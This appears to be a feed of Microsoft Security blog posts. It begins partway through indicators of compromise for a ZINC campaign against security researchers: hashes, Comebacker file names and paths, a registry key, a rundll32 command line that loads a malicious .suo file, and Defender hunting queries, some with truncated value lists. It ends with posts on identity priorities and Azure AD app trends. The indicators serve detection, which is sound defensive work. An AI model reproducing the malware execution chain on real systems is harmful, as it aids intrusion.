  • 4bfeb22ec438cf7ed8a7fefe6e7f321d842ad6ade0ca772732d1a757177e7ad7
  • 6b3a693d391426182fc2944d14b0816cdf1e5f87c13d6eb697756f9577b0bcee
  • 70e1f774c0c80e988641d709d3a6990193e039b1ce618ceaacc1d61a850e9b76
  • 77a9a0f67d09cafaf05ee090483a64622a7a04dfe226763f68651b071c1802f2
  • 8d85e31de2623538a42a211e3919d5602f99dc80f21e0c5f99d53838b2b07063
  • 90b4bd609b84c41beeed5b9310f2d84de83c74aaecfd1facc02e278be5059110
  • 9c90bbe4b61136d94170e90c299adab0d1ccbc3a8f71519799dd901d742f3561
  • 9f23069f74d0fb09823ad7f46f338d7920a731622404a7754df36ffbc40f8744
  • a1c4c617d99d10bbb2524b4d5bfdcf00f47d9cf39e8c7d3e6a9ce1219393da5a
  • a4fb20b15efd72f983f0fb3325c0352d8a266a69bb5f6ca2eba0556c3e00bd15
  • aa5264323755a7dfa7c39ada09224c8c1de03ec8aeb6f7b216a56e8475e5f547
  • aeb6fb0ba6d947b4ee67a5111fbdf798c4488377ae28bdf537c1f920a58785b7
  • b47969e73931546fdcfb1e69c43da911dc9f7bb8d0e211731a253b572ecdc4fe
  • bc19a9415428973d65358291d604d96a0915a01d4b06939269b9e210f23aad43
  • c5d13324100047d7def82eeafdb6fc98cc2ccfae56db66ada9f1c3c7429ef9cb
  • dcc986c48c9c99c012ae2b314ac3f2223e217aee2ccdfb733cbbdaea0b713589
  • e8cf9b04ba7054e1c34bda05106478f9071f8f6569b4822070834abbf8e07a95
  • b32319da446dcf83378ab714f5ad0229dff43c9c6b345b69f1a397c951c1122e
  • 11fef660dec27474c0c6c856a7b4619155821fdd1ce404848513a2700be806a5
  • 9e562cc5c3eb48a5f1a1ccd29bf4b2ff4ab946f45aa5d8ea170f69104b684023

viaglt64.sys – Vulnerable Vir.IT driver for CVE-2017-16238

  • 58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495

Other malware and tools

These are hashes of files we believe to be related to the attack but aren’t Comebacker or Klackring malware.

This list includes some hashes where we haven’t been able to retrieve a sample but based on the file usage or location looks likely to be related.

  • e0e59bfc22876c170af65dcbf19f744ae560cc43b720b23b9d248f4505c02f3e
  • 3d3195697521973efe0097a320cbce0f0f98d29d50e044f4505e1fbc043e8cf9
  • 0a2d81164d524be7022ba8fd4e1e8e01bfd65407148569d172e2171b5cd76cd4
  • 96d7a93f6691303d39a9cc270b8814151dfec5683e12094537fd580afdf2e5fe
  • dc4cf164635db06b2a0b62d313dbd186350bca6fc88438617411a68df13ec83c
  • 46efd5179e43c9cbf07dcec22ce0d5527e2402655aee3afc016e5c260650284a
  • 95e42a94d4df1e7e472998f43b9879eb34aaa93f3705d7d3ef9e3b97349d7008
  • 9d5320e883264a80ea214077f44b1d4b22155446ad5083f4b27d2ab5bd127ef5
  • 9fd05063ad203581a126232ac68027ca731290d17bd43b5d3311e8153c893fe3
  • ada7e80c9d09f3efb39b729af238fcdf375383caaf0e9e0aed303931dc73b720
  • edb1597789c7ed784b85367a36440bf05267ac786efe5a4044ec23e490864cee
  • 33665ce1157ddb7cd7e905e3356b39245dfba17b7a658bdbf02b6968656b9998
  • 3ab770458577eb72bd6239fe97c35e7eb8816bce5a4b47da7bd0382622854f7c
  • b630ad8ffa11003693ce8431d2f1c6b8b126cd32b657a4bfa9c0dbe70b007d6c
  • 53f3e55c1217dafb8801af7087e7d68b605e2b6dde6368fceea14496c8a9f3e5
  • 99c95b5272c5b11093eed3ef2272e304b7a9311a22ff78caeb91632211fcb777
  • f21abadef52b4dbd01ad330efb28ef50f8205f57916a26daf5de02249c0f24ef
  • 2cbdea62e26d06080d114bbd922d6368807d7c6b950b1421d0aa030eca7e85da
  • 079659fac6bd9a1ce28384e7e3a465be4380acade3b4a4a4f0e67fd0260e9447
  • 0b9133bc24593a358c0471da4aa9c7479270dab93c0941e5132af6ba177c5228

Host IOCs

Comebacker Visual Studio Project file execution

Rundll32.exe dxgkrnl_poc.vcxproj.suo,CMS_dataFinal Bx9yb37GEcJNK6bt 4231

Comebacker file names and exported function name

Note that the file name was often changed and these names shouldn’t be considered a definitive list:

  • NVIDIA.bin,SSL_HandShaking
  • adobe.bin,SSL_HandShaking
  • USOShared.bin,ntWindowsProc
  • update.dat,SetWebFilterString
  • update.bin,CleanupBrokerString
  • ntuser.db,glInitSampler
  • RdrCEF.bin,json_object_get_unicode_string
  • update.bin,ASN2_TYPE_new
  • USO.DAT,deflateSuffix
  • USO.DAT,cmsSetLogHandlerTHR
  • USO.DAT,sql_blob_open
  • localdb.db,ntSystemInfo

Registry Key

  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update

File path


This malware was deployed as a .sys file in C:\windows\system32\

  • C:\Windows\System32\helpsvc.sys
  • C:\Windows\System32\Irmon.sys
  • C:\Windows\System32\LogonHours.sys
  • C:\Windows\System32\Ntmssvc.sys
  • C:\Windows\System32\NWCWorkstation.sys
  • C:\Windows\System32\Nwsapagent.sys
  • C:\Windows\System32\PCAudit.sys
  • C:\Windows\System32\uploadmgr.sys

Generic folders and file paths for malware and tooling

These are folders and file paths that have been used by ZINC for malware and tools but may be used by other actors or produce false positives.

Look for .bin, .db, .dat, and .cpl files in the following folders, USOShared was most used across victims:

  • C:\ProgramData\USOShared\
  • C:\ProgramData\Adobe\
  • C:\ProgramData\Mozilla\
  • C:\ProgramData\NVIDIA\
  • C:\ProgramData\Oracle\
  • C:\ProgramData\VirtualBox\

Check these file paths for additional malware and tooling:

  • C:\MSCache\msomui.dat
  • C:\MSCache\local.cpl
  • C:\ProgramData\ntuser.db
  • C:\ProgramData\ntuser.ini
  • C:\ProgramData\taskhost.exe
  • C:\ProgramData\Adobe\get.exe
  • C:\ProgramData\Adobe\ARM\AdobeUpdate.exe
  • C:\ProgramData\Mozilla\update.bin
  • C:\ProgramData\NVIDIA\graphicscheck.exe
  • C:\ProgramData\NVIDIA\NVIDIA.bin
  • C:\ProgramData\Oracle\java.db
  • C:\ProgramData\Oracle\java.cpl
  • C:\ProgramData\USOShared\Search.bin
  • C:\Windows\netsvc.exe
  • C:\Windows\system32\kjchost.dll
  • C:\Windows\System32\traextapi.dll
  • C:\Windows\System32\healthextapi.dll
  • C:\Windows\System32\detaextapi.dll
  • C:\Windows\Temp\ads.tmp
  • C:\windows\Temp\CA_Root.pfx
  • C:\Recovery\recover.bin
  • C:\Recovery\re.bin

Advanced hunting queries

To locate possible exploitation activity related to the contents of this blog, you can run the following advanced hunting queries via Microsoft Defender for Endpoint:

Command and control

Look for backdoor establishing network connections to command and control. Run query in Microsoft Defender for Endpoint

| where RemoteUrl in~('',


Look for PowerShell launched from MSBUILD with the related commands. Run Query in Microsoft Defender for Endpoint

| where FileName =~ "powershell.exe"
| where ProcessCommandLine has "is64bitoperatingsystem" 
and ProcessCommandLine has "Debug\\Browse"

Malicious files

Look for the presence of malicious files related to this threat. Run the below query in Microsoft Defender for Endpoint

| where SHA256 in~(
// Malicious Visual Studio .vcxproj files
// Comebacker Malware
// Klackring Malware
// viaglt64.sys – Vulnerable Vir.IT driver for CVE-2017-16238
// Other potentially related malware and tools

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post ZINC attacks against security researchers appeared first on Microsoft Security.

5 identity priorities for 2021—strengthening security for the hybrid work era and beyond

January 28th, 2021 No comments

When I outlined the five identity priorities for 2020, the world was a very different place. Since then, the COVID-19 pandemic has forever changed how organizations run their businesses. It’s also changed the way we work, learn, and collaborate. What hasn’t changed is the critical role identity plays in helping organizations to be secure and productive.

Yesterday, we shared the progress we’ve made with our integrated security, compliance, identity, and management solutions. Identity alone has grown at an unprecedented pace—from 300 million monthly active users (MAU) in March 2020 to 425 million today. Organizations around the world have accelerated the adoption of security and collaboration apps. But behind these numbers are stories of customers like you, working tirelessly to help your organizations stay ahead.

As I prepare for our traditional customer co-innovation week and reflect on our customers’ challenges and business goals, I want to share our five identity priorities for this year. Many of the recommendations I outlined last year still apply. In fact, they’re even more relevant as organizations accept the new normal of flexible work while bad actors continue to master sophisticated cyber attack techniques. Our 2021 recommendations will help you strengthen your identity and security foundations for the long term, so you can be ready for whatever comes next.

1. Trust in Zero Trust

Zero Trust is back this year, but this time it’s at the top of the list. The “assume breach” mentality of Zero Trust has become a business imperative. Organizations need to harden their defenses to give employees the flexibility to work from anywhere, using applications that live outside of traditional corporate network protections. When the pandemic hit last year, we worked side by side with many of you. We noticed that organizations already on their Zero Trust journey had an easier time transitioning to remote work and strengthening their ability to fend off sophisticated attacks.

The good news is that 94 percent of the security leaders we polled last July told us they had already embarked on a Zero Trust journey. Wherever you are on your journey, we recommend making identity the foundation of your approach. You can protect against credentials compromise with essential tools like multifactor authentication (MFA) and benefit from innovations like risk assessment in Identity Protection, continuous access evaluation, Intune app-protection policies, as well as Microsoft Azure Active Directory (Azure AD) Application Proxy and Microsoft Tunnel.

Looking ahead, as more services act like people by running applications (via API calls or automation) and accessing or changing data, secure them using the same principles: make sure they only get access to the data they need, when they need it, and protect their credentials from misuse.

Where to start: Take the Zero Trust assessment and visit our Deployment Center for deployment guidelines.

2. Secure access to all apps

This was our top recommendation last year, and it couldn’t be more critical today. The growth in app usage with Azure AD shows that organizations are connecting more apps to single sign-on. While this provides seamless and secure access to more apps, the best experience will come from connecting all apps to Azure AD so people can complete all work-related tasks from home and stay safer during the pandemic. Connecting all apps to Azure AD also simplifies the identity lifecycle, tightens controls, and minimizes the use of weak passwords. The result is stronger security at a lower cost: Forrester estimates that such a move can save an average enterprise almost USD 2 million over three years.

Azure AD app gallery includes thousands of pre-integrated apps that simplify deployment of single sign-on and user provisioning. If you want to extend MFA and Conditional Access to legacy on-premises apps, including header-based apps, use Azure AD Application Proxy or an integrated solution from one of our secure hybrid access partners. With our migration tools, you can modernize authentication of all apps and retire your ADFS implementation. This will help prevent attacks that are particularly difficult to detect in on-premises identity systems.

It’s also important to limit the number of admins who can manage apps across your organization, to protect privileged accounts with MFA and Conditional Access, and to require just-in-time (JIT) elevation into admin roles with Privileged Identity Management.

Where to start: Learn how to use Azure AD to connect your workforce to all the apps they need.

3. Go passwordless

We’ll keep repeating the mantra “Go passwordless” as long as passwords remain difficult for people to remember and easy for hackers to guess or steal. Since last year we’ve seen great progress: in May, we shared that over 150 million users across Azure AD and Microsoft consumer accounts were using passwordless authentication. By November, passwordless usage in Azure AD alone had grown by more than 50 percent year-over-year across Windows Hello for Business, Microsoft Authenticator, and FIDO2 security keys from partners like AuthenTrend, Feitian, or Yubico.

Passwordless authentication can minimize or eliminate many identity attack vectors, including those exploited in the most sophisticated cyberattacks. At a minimum, going passwordless should be non-negotiable for admin-level accounts. Moreover, providing employees with a fast, easy sign-in experience saves time and reduces frustration. Forrester estimates that consolidating to a single identity solution and providing one set of credentials saves each employee 10 minutes a week on average, or more than 40 hours a year. Imagine additional savings from not having to reset passwords or mitigate phishing attacks.

Where to start: Read the Forrester Report, “The Total Economic Impact™ Of Securing Apps With Microsoft Azure Active Directory.”

4. Choose and build secure-by-design apps

Because attacks on applications are growing, it’s important to go a step beyond integrating apps with Azure AD to deploying apps that are secure by design. Build secure authentication into the apps you write yourself using the Microsoft Authentication Library (MSAL). Ideally, apps should go passwordless too, so ensure they’re using strong credentials like certificates. If your apps interact with other Microsoft services, take advantage of the identity APIs in Microsoft Graph. Whenever possible, choose third-party apps from verified publishers. Since publisher verification badges make it easier to determine whether an app comes from an authentic source, encourage your ISV partners to become verified publishers if they haven’t already.

Since most apps ask to access company data, administrators may choose to review consent requests before granting permissions. While neglecting to review requests is a security risk, doing it for every single app used by every single employee takes too much time and costs too much. Fortunately, new features like app consent policies and admin consent workflow help avoid the extreme choices of reviewing all requests or delegating full responsibility to employees. Regularly review your apps portfolio and take action on overprivileged, suspicious, or inactive apps.

Where to start: Update your applications to use Microsoft Authentication Library and Microsoft Graph API, adopt app consent policies and publisher verification practices, and follow identity platform best practices.

5. Break collaboration boundaries

We know that partners, customers, and frontline workers are essential to your business. They, too, need simple and secure access to apps and resources, so they can collaborate and be productive, while administrators need visibility and controls to protect sensitive data.

Simplify collaboration for external users with intuitive self-service sign-up flows and the convenience of using their existing email or social account. For frontline workers, Azure AD offers simple access, through sign-in with a one-time SMS passcode, which eliminates the need to remember new credentials. For frontline managers, the My Staff portal makes it easy to set up SMS sign-in, to reset passwords, and to grant access to resources and shared devices without relying on help desk or IT.

Visibility and control are easier to achieve when managing all identities using a common toolset. You can apply the same Conditional Access policies for fine-grained access control to services, resources, and apps. By setting up access review campaigns, or using automated access reviews for all guest users in Microsoft Teams and Microsoft 365 groups, you can ensure that external guests don’t overstay their welcome and only access resources they need.

Where to start: Learn more about Azure AD External Identities and using Azure AD to empower frontline workers.

Get started on the future now: Explore verifiable credentials

During the pandemic, you’ve had to support not only remote work but also remote recruiting. People usually show up to an interview with documentation in hand that confirms their identity and qualifications. It’s more complicated to vet candidates remotely, especially when hiring needs to happen quickly—for example, in the case of essential workers.

Microsoft and industry-leading ID verification partners are pushing the frontier of identity by transforming existing ID verification practices with open standards for verifiable credentials and decentralized identifiers. Verifiable credentials are the digital equivalent of documents like driver’s licenses, passports, and diplomas. In this paradigm, individuals can verify a credential with an ID verification partner once, then add it to Microsoft Authenticator (and other compatible wallets) and use it everywhere in a trustworthy manner. For example, a gig worker can verify their driver’s license and picture digitally, and then use it to get hired by a ride-sharing service and a food delivery company.

Such an approach can improve verification while protecting privacy across the identity lifecycle: onboarding, activating credentials, securing access to apps and services, and recovering lost or forgotten credentials. We’re piloting this technology with customers like the National Health Service in the UK and MilGears, a program of the United States Department of Defense that helps service members and veterans enroll in higher education and jumpstart their civilian careers.

Where to start: Watch our Microsoft Ignite session on Decentralized Identity and join the Decentralized Identity Foundation.

Whether your top priority is modernizing your infrastructure and apps or implementing a Zero Trust security strategy, we are committed to helping you every step of the way. Please send us your feedback so we know what identity innovations you need to keep moving forward on your digital transformation journey.

The post 5 identity priorities for 2021—strengthening security for the hybrid work era and beyond appeared first on Microsoft Security.

The state of apps by Microsoft identity: Azure AD app gallery apps that made the most impact in 2020

January 27th, 2021 No comments

2020 was an unprecedented year, to say the least. The COVID-19 global pandemic drastically changed how we work, learn, and collaborate. Organizations had to find new ways to connect and maintain productivity while providing secure access to critical apps and resources. Our own Microsoft services, like Teams, served as the lifeline for remote and hybrid work and learning during the pandemic—growing rapidly from 44 million daily active users in March 2020 to 115 million daily active users this past October. But we know that businesses need many tools and apps to succeed, and our commitment is to ensure that solutions work seamlessly and securely across platforms and extend to all clouds and apps.

Recently, we analyzed enterprise cloud app usage and took a deeper look at how and what applications organizations are securing with Azure Active Directory (Azure AD). In our analysis, we looked at organizations’ application usage within our Azure AD app gallery, excluding Microsoft applications such as Azure, Dynamics 365, Office 365, and Teams. Our Azure AD app gallery enables organizations to quickly secure and manage apps of all types and includes thousands of pre-integrated apps. We’re seeing customers of all sizes integrate all their apps with Azure AD to give their workforce a more convenient and secure experience. Read on for insights into how app usage shifted in 2020 compared to the years prior.

The rise of security and collaboration apps to enable remote work

The challenges of 2020 forced leaders to rethink their priorities to ensure their teams can securely access apps from anywhere, anytime. The statistics reflect this. For example, the number of monthly active users of Azure AD app gallery apps has increased 109 percent year-over-year. And last year, when Microsoft surveyed 800 business leaders about their views of the pandemic threat landscape, they listed “Providing secure remote access to resources, apps, and data” as their number one challenge.

Line graph showing Azure AD app gallery monthly active users has grown over 109% year-over-year.

It’s no surprise, then, that apps and services that help ensure secure, remote access to on-premises, and cloud resources grew tremendously last year. Organizations have recognized that remote access to all apps including legacy, on-premises apps have become critically important in the new way of work. Security tools like Citrix ADC, Palo Alto Networks Prisma Access, and Zscaler Private Access, which help employees securely access any app regardless of location, have become business-critical, making them some of the fastest-growing applications in our app gallery this past year.

In addition to increasing investments in the security space, communication, and collaboration apps have been instrumental to ensure business continuity. We recognize that securing any app is a team effort, so we work closely with app providers of all types to integrate with Azure AD, even Microsoft competitors. Apps like Cisco Webex, Google Cloud / Google Workspace, Workplace from Facebook, and Zoom are some of the top apps Azure AD secures to help organizations maintain productivity while helping people feel more connected.

We’ve also continued to see a few apps consistently in our most popular apps list. Human Resource apps like SAP SuccessFactors and Workday and IT Service Management apps like ServiceNow continue to see widespread usage among our customers in 2020.

The top apps of 2020

The global pandemic clearly had an impact on which apps were used the most. Companies shifting to remote work improved productivity with apps that strengthened communication, collaboration, and security.

For the first time, security apps like Palo Alto Networks Prisma Access and Zscaler Private Access made their way to the top 15 apps by monthly active users. Other newcomers to the top 15 apps list include collaboration and communication apps; Workplace from Facebook and Zoom. Zoom not only made its 2020 debut within the top 15 on this list, it catapulted to number 5.

Table showing the top 15 applications in the Azure AD app gallery by monthly active users in 2020, 2019 and 2018.

ServiceNow continues to lead in monthly active users for the third year in a row. Google Cloud / Google Workspace, SAP SuccessFactors, and Workday have maintained their leading ranks through the years, as organizations of all sizes need HR, IT Service Management, and general productivity applications.

From Q1 2020 to Q2 2020, as the global pandemic hit, many of these top apps accelerated in usage to help provide secure remote access for users and to help manage their digital workflows.

Line graph that shows monthly active users of the top 15 applications by monthly active users graphed from Q3 2018 to Q4 2020.

We also noticed some subtle differences when comparing the most popular apps by monthly active users with the most popular apps by the number of organizations. Popularity by the number of organizations looks at the apps most used among our customers. With organizations relying more heavily on video conferencing, Zoom made the jump from number 10 in 2018 to number 1 in 2020, pushing list leaders like Google Cloud / Google Workspace, and Salesforce from the top two spots.

In addition to Zoom, KnowBe4 Security Awareness made its way to the top 5 apps in 2020. It rose from number 12 in 2018 to number 8 in 2019, increasing steadily in usage from the beginning of quarter two 2020 to the end of the year, stressing the importance of security training and awareness within the workforce.

Table showing the top 15 applications in the Azure AD app gallery by number of organizations in 2020, 2019, 2018.

Cisco Webex, DocuSign, Mimecast Personal Portal, and Palo Alto Networks Prisma Access made their first appearance on this list in 2020, reinforcing the shifts we’ve seen throughout our analysis.

Unlike the security and collaboration apps that topped the list, apps like SAP Concur, a travel and expense management service, dropped off the top 15 list. Due to travel restrictions, those used to traveling regularly for work have swapped out face-to-face meetings for virtual calls from home.

Line graph that shows number of organizations of the top 15 applications by number of organizations graphed from Q3 2018 to Q4 2020.

The most popular apps by organization size

When we analyzed the most popular apps used based on organization size, we found several apps commonly deployed in organizations of all sizes: Google Cloud / Google Workspace, Salesforce, and Zoom.

In contrast, deployment of HR and IT service management apps, necessary to ensure business continuity during the pandemic, differ based on the organization size. These apps have not only helped enable remote onboarding and offboarding, but they’ve also helped IT teams fulfill employee requests for applications, devices, or services.

While enterprise and mid-market organizations use HR apps such as SAP SuccessFactors and Workday, small businesses commonly use BambooHR. And HR apps like UltiPro and Cornerstone OnDemand are used more by mid-market businesses.

Enterprise and mid-market organizations regularly deploy the IT service management app ServiceNow, while small businesses predominantly use Freshservice.

The top 10 most popular apps in the Azure AD app gallery based on organization size. Organization size based on enterprise (5000+ monthly active users), mid-market (250-4999 monthly active users) and small business (<250 monthly active users).

The most popular apps by industry

The same broad trends and app usage apply to the most popular apps by industry. Apps like Google Cloud / Google Workspace, Salesforce, ServiceNow, Workday, and Zoom are popular across all industries. Security, collaboration, and workflow management were priorities this past year despite the differences between each industry.

One industry, education, had a distinct set of popular apps, with apps like Brightspace, Canvas, and Clever ranking in the top five. These learning management systems helped schools and institutions adapt to remote learning and became central hubs for digital instruction this past year.

For shift-based industries that rely on frontline workers, like Retail and Healthcare, Kronos is a popular app to help with workforce management activities like employee scheduling.

The top 5 most popular apps in the Azure AD app gallery based on industry. Industries include travel, telecom, retail, professional services, manufacturing, healthcare, government, financial services, education, consumer goods, automotive, energy

The most popular apps by category

This year, we also analyzed the most popular apps across app categories based on monthly active users. We looked at the top five apps across 10 app categories, ranging from education apps to security apps to IT service management apps, as summarized in the table below.

The top 5 most popular apps in the Azure AD app gallery based on application category. Categories include, education, human resources, security, IT service management, data services, travel and expenses, CRM, communication and collaboration, content management, project management.

2020’s fastest-growing apps

Apps that help employees with secure remote work are not only some of the most popular but also among the fastest-growing. Half of the top 10 fastest growing apps in 2020 were security-focused. Apps from our secure hybrid access partnerships—Citrix ADC, Palo Alto Networks Prisma Access, and Zscaler Private Access—which enable customers to access legacy and on-premises apps, have also grown quickly. Other security apps include Cisco Umbrella, the fastest growing app this past year, and BeyondTrust Remote Support.

Zoom saw extraordinary growth in 2020. Its place as the third fastest-growing app this past year is particularly impressive given it was already popular and widely used. Data management and analytics solutions grew quickly this year too. Snowflake and SAP Analytics Cloud became the eighth and ninth fastest-growing apps, respectively.

This past year also saw Amazon Business become one of the fastest-growing apps. Amazon Business is a marketplace that simplifies the purchasing process and helps get products into the hands of organizations. The pandemic accelerated online shopping for consumers and it’s no different for businesses. Businesses have shifted their purchasing and procurement to online with Amazon Business becoming the fifth fastest growing app in 2020.

Bar chart showing the fastest growing apps by year-over-year percentage growth by monthly active users in the Azure AD app gallery in 2020.

Secure digital transformation

Whether we look at the most popular apps by monthly active users, the number of organizations, industries, or customer type, or we look at the fastest growing apps of 2020, investment in security is an undeniable trend. The pandemic has both accelerated digital transformation timelines and increased the need for advanced security that organizations can rely on to provide secure access to their users wherever they may be working.

We’ve seen more users turn on security capabilities like multi-factor authentication (MFA)—the number of monthly active users utilizing MFA with Azure AD has grown 150 percent year-over-year. Passwordless technology also experienced a breakthrough year. Passwordless usage in Azure AD went up by more than 50 percent for Windows Hello for Business, passwordless phone sign-in with Microsoft Authenticator, and FIDO2 security keys.

Our own Azure AD App Proxy service, which helps organizations with remote access to critical on-premises apps, also experienced huge growth this past year. From February to March, the number of monthly active users spiked by roughly 60 percent as the global pandemic started to take hold. Since then, the number of monthly active users has continued to rise, increasing by roughly 100 percent year-over-year. Thanks to Azure AD App Proxy, organizations have been able to quickly provide secure, remote access to mission-critical apps that reside on-premises or use legacy authentication protocols like HTTP or header-based.

Line graph showing Azure AD app proxy monthly active users has grown over 100% year-over-year.

That’s a wrap on 2020

Users, organizations, and industries alike are investing in improving security and collaboration. Cloud-based apps that provide secure access and reliable communication have become a vital part of organizations’ day-to-day operations.

App adoption is growing, and the changing digital landscape has changed the way people work. From security apps like Palo Alto Networks Prisma Access to education apps like Blackboard Learn and communication apps like Zoom or Teams, people are relying more heavily on cloud apps to get their work done. We expect these trends to continue past 2020 as security remains a top priority and remote work continues to require advanced communication and collaboration capabilities. In the wake of 2020, companies will continue to evaluate the cultural and business impact of the shift to remote work and to try to understand where that shift will take them in 2021.

Connecting all of your apps to Azure AD can help safeguard and streamline access while simplifying management and reducing costs. In fact, Forrester estimates that customers can gain a 123 percent return on investment by secure all apps with Azure AD. To learn how to help your employees working from home remain productive, visit our secure remote work resources or read the Top 5 ways Azure AD can help you enable remote work. We hope you’ve enjoyed this year’s app trends data report, which you can also download here, and we look forward to seeing you next year.


Microsoft takes privacy seriously. We remove all personal data and organization-identifying data, such as company name, from the data before using it to produce reports. We never use customer content such as information within an email, chat, document, or meeting to produce reports. Application usage and trend data in this report was analyzed based on applications available in the Azure AD app gallery. We excluded Microsoft owned applications from the data such as Office 365, Teams, Azure, Dynamics, LinkedIn, GitHub, and other Microsoft applications from this report. The report includes data from December 31, 2018, to December 31, 2020.

The post The state of apps by Microsoft identity: Azure AD app gallery apps that made the most impact in 2020 appeared first on Microsoft Security.